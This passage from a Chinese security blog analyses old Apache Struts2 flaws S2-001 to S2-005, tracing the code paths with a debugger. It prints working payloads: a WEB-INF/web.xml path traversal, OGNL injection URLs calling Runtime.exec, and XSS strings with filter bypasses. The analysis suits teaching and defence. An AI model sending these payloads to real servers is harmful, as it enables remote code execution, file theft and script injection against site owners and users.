<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223101612422.png" alt="image-20201223101612422"></p>
<p>当<code>resourcePath</code>的路径为<code>/struts</code>会调用<code>findStaticResource</code>方法</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223102109094.png" alt="image-20201223102109094"></p>
<p>访问的静态文件不能以<code>.class</code> 结尾,其实这个限制没有什么用,然后遍历配置好的静态文件目录并调用 <code>findInputStream</code><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223103005752.png" alt="image-20201223103005752"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223102453441.png" alt="image-20201223102453441"></p>
<p>将访问的路径跟目录拼接在一起,然后 URL 解码,再调用 <code>getResourceAsStream</code>开始读取文件,就造成了目录遍历漏洞。</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223102649847.png" alt="image-20201223102649847"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223105441336.png" alt="image-20201223105441336"></p>
<p>POC:</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">/struts/..%<span class="number">252f</span>/</span><br><span class="line">/struts/..%<span class="number">252f</span>..%<span class="number">252f</span>..%<span class="number">252f</span>WEB-INF/web.xml</span><br></pre></td></tr></table></figure>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><p>加上了 cleanupPath、URL.getFile 和 endWith 来进行限制。</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224120316800.png" alt="image-20201224120316800"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224120423548.png" alt="image-20201224120423548"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224121310332.png" alt="image-20201224121310332"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223105230910.png" alt="image-20201223105230910"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://aluvion.gitee.io/2020/07/16/struts2%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E-S2-004/#%E5%89%8D%E8%A8%80" target="_blank" rel="noopener">https://aluvion.gitee.io/2020/07/16/struts2%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E-S2-004/#%E5%89%8D%E8%A8%80</a></p>
<p><a href="https://xz.aliyun.com/t/7967" target="_blank" rel="noopener">https://xz.aliyun.com/t/7967</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-004" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-004</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-003、005漏洞分析</title>
<url>/2020/12/24/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h3 id="Struts2-003"><a href="#Struts2-003" class="headerlink" title="Struts2-003"></a>Struts2-003</h3><h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>可参考官方安全公告:<a href="https://cwiki.apache.org/confluence/display/WW/S2-003" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-003</a></p>
<p>POC:</p>
<figure class="highlight less"><table><tr><td class="code"><pre><span class="line"><span class="selector-tag">login</span><span class="selector-class">.action</span>?(<span class="string">'\u0023context[\'</span>xwork.MethodAccessor.denyMethodExecution\<span class="string">']\u003dfalse'</span>)(bla)(bla)<span class="selector-tag">&</span>(<span class="string">'\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\'</span>calc\<span class="string">')'</span>)(bla)(bla)</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>s2-003漏洞的payload用到了特殊字符,这里使用低版本tomcat6来测试。</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">tomcat高版本会严格按照 RFC <span class="number">3986</span>规范进行访问解析,而 RFC <span class="number">3986</span>规范定义了Url中只允许包含英文字母 a-zA-Z、数字<span class="number">0</span><span class="number">-9</span>、-_.~ <span class="number">4</span>个特殊字符以及所有保留字符(RFC3986中指定了以下字符为保留字符:! * ’ ( ) ; : @ & = + $ , / ? # [ ])</span><br><span class="line"></span><br><span class="line">在高版本的tomcat,如果url中要使用下列字符,需要进行url编码,否则会返回<span class="number">400</span>状态码。</span><br><span class="line">^[]{}\|<span class="string">"<>`</span></span><br></pre></td></tr></table></figure>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>根据官方概述,问题出现在ParameterInterceptors.java。</p>
<p>此时我们在ParametersInterceptor拦截器入口方法进行断点doIntercept()</p>
<p>在<code>getValueStack</code>之前,执行了一些初始化操作,将<code>xwork.MethodAccessor.denyMethodExecution</code>设置为<code>true</code>。为了能够调用方法,需要在poc中的第一部分将<code>denyMethodExecution</code>设置为<code>false</code>,之后才能任意代码执行。</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222161256364.png" alt="image-20201222161256364"></p>
<p>跟入<code>setParameters(action, stack, parameters);</code>此部分开始通过迭代器取出一个个传入的参数,并进行处理。</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222154340316.png" alt="image-20201222154340316"></p>
<p>跟入<code>acceptableName</code>发现<code>acceptableName</code> 方法判断参数是否含有非法字符,可以发现非法字符中包含 <code>#</code>号,所以我们的 <code>payload</code>需要将 <code>#</code> 号编码成 <code>\u0023</code> 。通过校验后,会调用 <code>setValue</code> 方法将值添加进值栈</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222155111292.png" alt="image-20201222155111292"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222155058451.png" alt="image-20201222155058451"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222162610882.png" alt="image-20201222162610882"></p>
<p>跟入<code>setValue</code> 方法,该方法中调用了<code>Ognl.setValue()</code> </p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222154519290.png" alt="image-20201222154519290"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222160456612.png" alt="image-20201222160456612"></p>
<p><code>Ognl.setValue()</code> 方法中会调用 <code>compile</code> 方法对字符串进行解析,在解析字符串时,程序会对 <code>\u</code> 字符进行解码。</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222160221068.png" alt="image-20201222160221068"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222174507709.png" alt="image-20201222174507709"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222174704079.png" alt="image-20201222174704079"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222181149389.png" alt="image-20201222181149389"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222182008083.png" alt="image-20201222182008083"></p>
<p>又会回到 <code>Ognl.setValue()</code> ,表达式的解析执行</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222164908265.png" alt="image-20201222164908265"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222165844689.png" alt="image-20201222165844689"></p>
<p>对参数名特殊字符过滤不完善,通过<code>\u0023</code>(16进制的<code>#</code>)、八进制的<code>\43</code>,绕过正则表达式,从而执行了<code>OGNL</code>表达式.</p>
<h3 id="Struts2-005"><a href="#Struts2-005" class="headerlink" title="Struts2-005"></a>Struts2-005</h3><h4 id="漏洞概要-1"><a href="#漏洞概要-1" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>可参考官方安全公告:<a href="https://cwiki.apache.org/confluence/display/WW/S2-005" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-005</a></p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">S2<span class="number">-005</span>漏洞的起源源于S2<span class="number">-003</span>(受影响版本: 低于Struts <span class="number">2.0</span><span class="number">.12</span>),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(u0023)或<span class="number">8</span>进制(<span class="number">43</span>)即绕过了安全限制,对于S2<span class="number">-003</span>漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这些选项打开,S2<span class="number">-003</span>的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上。—— 《白帽子讲Web安全》</span><br></pre></td></tr></table></figure>
<p>POC:</p>
<figure class="highlight taggerscript"><table><tr><td class="code"><pre><span class="line">login.action?('<span class="symbol">\u</span>0023_memberAccess[<span class="symbol">\'</span>allowStaticMethodAccess<span class="symbol">\'</span>]')(meh)=true&(aaa)(('<span class="symbol">\u</span>0023context[<span class="symbol">\'</span>xwork.MethodAccessor.denyMethodExecution<span class="symbol">\'</span>]<span class="symbol">\u</span>003d<span class="symbol">\u</span>0023foo')(<span class="symbol">\u</span>0023foo<span class="symbol">\u</span>003dnew<span class="variable">%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1</span></span><br></pre></td></tr></table></figure>
<h4 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>S2-005 是对 S2-003 修复的绕过,对比一下 <code>ParametersInterceptor</code> 的源码</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224161108681.png" alt="image-20201224161108681"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224161151927.png" alt="image-20201224161151927"></p>
<p>官方通过增加禁止静态方法调用 <code>allowStaticMethodAcces</code> 、类方法执行 <code>MethodAccessor.den yMethodExecution</code> 等安全配置来进行修复,我们可以利用 <code>OGNL</code> 表达式来进行操作更改值,从而进行一个绕过。</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224162439935.png" alt="image-20201224162439935"></p>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><p>使用了更加严格的正则 <code>[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+</code> 来校验参数名的合法性。</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224184426800.png" alt="image-20201224184426800"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://xz.aliyun.com/t/7966" target="_blank" rel="noopener">https://xz.aliyun.com/t/7966</a></p>
<p><a href="https://xz.aliyun.com/t/2323" target="_blank" rel="noopener">https://xz.aliyun.com/t/2323</a></p>
<p><a href="https://mp.weixin.qq.com/s/xaVxdYPRIhlxiFLy9WhUHA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/xaVxdYPRIhlxiFLy9WhUHA</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-003" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-003</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-002 漏洞分析</title>
<url>/2020/12/24/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>可参考官方安全公告:<a href="https://cwiki.apache.org/confluence/display/WW/S2-002" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-002</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>通过官网的安全公告,我们大概知道问题是出在标签<code><s:url></code>和 <code><s:a></code>标签</p>
<p>中,如下是我们的<code>index.jsp</code>代码</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line"><%@ taglib prefix=<span class="string">"s"</span> uri=<span class="string">"/struts-tags"</span> %></span><br><span class="line"><%@ page contentType=<span class="string">"text/html;charset=UTF-8"</span> language=<span class="string">"java"</span> %></span><br><span class="line"><html></span><br><span class="line"> <head></span><br><span class="line"> <meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html; charset=UTF-8"</span>></span><br><span class="line"> <title>s2-002</title></span><br><span class="line"> </head></span><br><span class="line"> <body></span><br><span class="line"> <h2>s2-002 demo</h2></span><br><span class="line"> <p>link: <a href=<span class="string">"https://cwiki.apache.org/confluence/dispaly/WW/S2-002"</span>></span><br><span class="line"> </a>https://cwiki.apache.org/confluence/dispaly/WW/S2-002 </p></span><br><span class="line"> <s:url action="login" includeParams="all" ></s:url></span><br><span class="line"> </body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>由于s2的标签库都是集成与<code>ComponentTagSupport</code>类,<code>doStartTag</code>方法也是在该类里实现,所以我们直接从<code>ComponentTagSupport</code>类<code>doStartTag</code>方法进行断点调试, 首先我们看一下<code>doStartTag</code>方法:</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220160944540.png" alt="image-20201220160944540"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220161002678.png" alt="image-20201220161002678"></p>
<p>由于我们这里处理的是 <code>s:url</code> 标签,所以这里用来处理标签的组件 <code>this.component</code>为<code>org.apache.struts2.components.URL</code>类对象。我们跟进 <code>URL:start()</code>方法。</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221141410686.png" alt="image-20201221141410686"></p>
<p>在 <code>URL:start()</code>方法中,我们看到当<code>includeParams=all</code>时,会调用 <code>mergeRequestParameters</code>方法。</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221141714877.png" alt="image-20201221141714877"></p>
<p>在 <code>mergeRequestParameters</code>方法中,程序会将 <code>this.req.getParameterMap()</code>获得的键值对数据存入 <code>this.parameters</code>属性。</p>
<p><code>getParameterMap()</code>返回一个map类型的request参数</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line">http://192.168.174.1:8888/Struts2_demo_war_exploded/?<span class="tag"><<span class="name">script</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure>
<p>那么解析后的map就是 : <code>key= <script>alert(1)</script>、vaule = ""</code> 并未看到对参数进行任何过滤,</p>
<p>getParameterMap()方法并不会对数据进行任何处理。<a href="#demo">可见下文demo实例</a></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221142411460.png" alt="image-20201221142411460"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221142719076.png" alt="image-20201221142719076"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221142946058.png" alt="image-20201221142946058"></p>
<p>最后进入<code>doEndTag</code>方法进行处理</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221170346052.png" alt="image-20201221170346052"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221170317717.png" alt="image-20201221170317717"></p>
<p><code>determineActionURL</code>方法中调用了<code>URLHelper</code>类处理 <code>this.parameters</code> 数据并进行返回</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221153821932.png" alt="image-20201221153821932"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221153301168.png" alt="image-20201221153301168"></p>
<p>将其写入,导致XSS漏洞。</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221153500644.png" alt="image-20201221153500644"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222113854119.png" alt="image-20201222113854119"></p>
<p><code>includeParams=get</code>时并不能触发 XSS 漏洞。</p>
<p>主要原因在于:当<code>includeParams=all</code>时,会多执行一个<code>mergeRequestParameters</code> 方法,而该方法会将 <code>this.req.getParameterMap()</code>数据设置到<code>this.parameters</code> 。如果 <code>includeParams=get</code>,那么 <code>this.parameters</code>中的数据,仅是来自 <code>this.req.getQueryString()</code></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222113001419.png" alt="image-20201222113001419"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222113440372.png" alt="image-20201222113440372"></p>
<p>而 <code>this.req.getParameterMap()</code>获得的数据会主动进行<code>URLdecode</code> ,但是<code>this.req.getQueryString()</code>不会。所以 <code>includeParams=get</code>时,返回的数据是被 <code>URLencode</code> 过的,因此不能触发 XSS 漏洞。<a href="#demo">可见下文demo实例</a></p>
<h4 id="demo实例"><a href="#demo实例" class="headerlink" title="demo实例"></a>demo实例</h4><p><span id="demo">demo实例</span></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.util.Iterator;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="meta">@WebServlet</span>(<span class="string">"/test"</span>)</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Hello</span> <span class="keyword">extends</span> <span class="title">HttpServlet</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doGet</span><span class="params">(HttpServletRequest request, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException </span>{</span><br><span class="line"> System.out.println(<span class="string">"getQueryString:"</span>+<span class="string">"\n"</span>+request.getQueryString());</span><br><span class="line"> Map<String, String[]> parameterMap = request.getParameterMap();</span><br><span class="line"> Iterator<Map.Entry<String, String[]>> iterator = parameterMap.entrySet().iterator();</span><br><span class="line"> <span class="keyword">while</span> (iterator.hasNext()){</span><br><span class="line"> Map.Entry<String, String[]> next = iterator.next();</span><br><span class="line"> System.out.println(<span class="string">"getParameterMap:"</span>+<span class="string">"\n"</span>+<span class="string">"key="</span>+next.getKey()+<span class="string">'\n'</span>+<span class="string">"value="</span>+next.getValue()[<span class="number">0</span>]);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221180716399.png" alt="image-20201221180716399"></p>
<p>Poc:</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">?<span class="xml"><span class="tag"><<span class="name">script</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span></span><br></pre></td></tr></table></figure>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><p>根据公告,我们需要升级到Struts 2.0.11.1版本,未真正修复,仅仅是对script标签进行替换,仍然可以对其进行绕过</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222111554160.png" alt="image-20201222111554160"></p>
<p>bypass POC:</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line">?<span class="tag"><<span class="name">script</span> <span class="attr">1</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span><br><span class="line">?<span class="tag"><<span class="name">strong</span>></span>script<span class="tag"></<span class="name">strong</span>></span></span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://cwiki.apache.org/confluence/display/WW/S2-002" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-002</a></p>
<p><a href="https://xz.aliyun.com/t/7916" target="_blank" rel="noopener">https://xz.aliyun.com/t/7916</a></p>
<p><a href="https://dean2021.github.io/posts/s2-002/" target="_blank" rel="noopener">https://dean2021.github.io/posts/s2-002/</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-001 漏洞分析</title>
<url>/2020/12/24/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>可参考官方安全公告:<a href="https://cwiki.apache.org/confluence/display/WW/S2-001" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-001</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>在HTTP请求被Struts2处理时,首先读取<code>web.xml</code>文件,这个是网站配置文件,里面有个过滤器,叫:<code>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</code>然后这个过滤器执行完之后,会经过一系列的拦截器,这些拦截器可以是默认的,也是可以用户自定义的。</p>
<p>Struts2请求处理流程(来自攻击JavaWeb应用[5]):</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225113205710.png" alt="image-20201225113205710"></p>
<figure class="highlight lsl"><table><tr><td class="code"><pre><span class="line">这里科普几个概念</span><br><span class="line">拦截器概念</span><br><span class="line">拦截器(Interceptor)是Struts2框架的核心功能之一,Struts <span class="number">2</span>是一个基于MVC设计模式的开源框架, [<span class="number">3</span>] 主要完成请求参数的解析、将页面表单参数赋给值栈中相应属性、执行功能检验、程序异常调试等工作。Struts2拦截器是一种可插拔策略,实现了面向切面的组件开发,当需要扩展功能时,只需要提供对应拦截器,并将它配置在Struts2容器中即可,如果不需要该功能时,也只需要在配置文件取消该拦截器的设置,整个过程不需要用户添加额外的代码。拦截器中更为重要的概念即拦截器栈(Interceptor Stack),拦截器栈就是Struts2中的拦截器按一定的顺序组成的一个线性链,页面发出请求,访问Action对象或方法时,栈中被设置好的拦截器就会根据堆栈的原理顺序的被调用。 </span><br><span class="line"></span><br><span class="line">说人话:struts2是框架,封装的功能都是在拦截器里面,封装很多功能,有很多拦截器,不是每次这些拦截器都执行,每次执行默认的拦截器,默认拦截器位置struts2-core<span class="number">-2.0</span><span class="number">.8</span>.jar!\struts-<span class="section">default</span>.xml,在执行拦截器,执行过程使用aop思想,在action没有直接调用拦截器方法,而是使用配置文件进行操作,在执行拦截器时候,执行很多的拦截器,这个过程使用责任链模式,例如:执行三个拦截器,执行拦截器<span class="number">1</span>->执行完放行->执行拦截器<span class="number">2</span>->执行完放行->执行拦截器<span class="number">3</span>->执行完放行->执行action方法。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">拦截器什么时候执行呢?</span><br><span class="line">在action对象之后,action方法执行之前</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>例如下图<code>struts.xml</code>中的<code>package</code> 继承了<code>struts</code>默认的拦截器(struts-default),具体可以查看<code>struts-default.xml</code>文件。</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/simage-20201218102840514.png" alt="image-20201218102840514"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218104357386.png" alt="image-20201218104357386"></p>
<p>这里我们要关注<code>params</code>这个拦截器,代码位置:<code>xwork-2.0.3.jar!\com\opensymphony\xwork2\interceptor\ParametersInterceptor.class</code></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218111703265.png" alt="image-20201218111703265"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218113626884.png" alt="image-20201218113626884"></p>
<p>经过一系列的拦截器处理后,数据会成功进入实际业务 <code>Action</code>。程序会根据<code>Action</code> 处理的结果,选择对应的 <code>JSP</code>视图进行展示,并对视图中的 <code>Struts2</code> 标签进行处理。</p>
<p>在本实例中<code>Action</code>处理用户登录是返回<code>error</code></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218144456659.png" alt="image-20201218144456659"></p>
<p>根据返回结果以及先前在<code>struts.xml</code>中定义的视图,程序将开始处理 <code>index.jsp</code></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218144537239.png" alt="image-20201218144537239"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218144810408.png" alt="image-20201218144810408"></p>
<p>从代码里我们可以看得到,<code>struts2</code>使用了自定义标签库,也就是<code>/struts-tags</code>, 通过阅读 <code>struts2-core-2.0.8.jar!/META-INF/struts-tags.tld</code>文件,我们得知这个<code>textfield</code>标签实现类是<code>org.apache.struts2.views.jsp.ui.TextFieldTag</code></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220153156591.png" alt="image-20201220153156591"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220153226282.png" alt="image-20201220153226282"></p>
<p>了解jsp自定义标签的同学应该知道,这时候我们需要找的是<code>doStartTag</code>方法,因为解析标签是从这个方法开始,具体可以参考 <a href="https://blog.csdn.net/zljjava/article/details/17420809" target="_blank" rel="noopener">TagSupport详解</a>, 通过在<code>TextFieldTag</code>类的<code>ComponentTagSupport</code>父类我们找到<code>doStartTag</code>方法</p>
<p>当在<code>JSP</code> 文件中遇到 <code>Struts2</code>标签 时,由于s2的标签库都是集成与<code>ComponentTagSupport</code>类,程序会先调用 <code>doStartTag</code> ,并将标签中的属性设置到 <code>TextFieldTag</code>对象相应属性中。</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218154513302.png" alt="image-20201218154513302"></p>
<p>最后,在遇到 <code>/></code>结束标签的时候调用 <code>doEndTag</code> 方法。</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218152120932.png" alt="image-20201218152120932"></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">int</span> <span class="title">doEndTag</span><span class="params">()</span> <span class="keyword">throws</span> JspException </span>{</span><br><span class="line"> <span class="keyword">this</span>.component.end(<span class="keyword">this</span>.pageContext.getOut(), <span class="keyword">this</span>.getBody());</span><br><span class="line"> <span class="keyword">this</span>.component = <span class="keyword">null</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">6</span>;</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<p>我们跟进<code>this.component.end</code>方法,该方法调用了 <code>this.evaluateParams();</code>方法来填充<code>JSP</code>中的动态数据。</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218152528873.png" alt="image-20201218152528873"></p>
<p>跟进<code>this.evaluateParams</code>方法,发现如果开启<code>OGNL</code>表达式支持(this.altSyntax()),会进行属性字段添加<code>OGNL</code>表达式字符(%{name})</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218152851979.png" alt="image-20201218152851979"></p>
<p>然后使用<code>findValue</code>方法从值栈中获得该表达式所对应的值,跟进<code>findValue</code>方法</p>
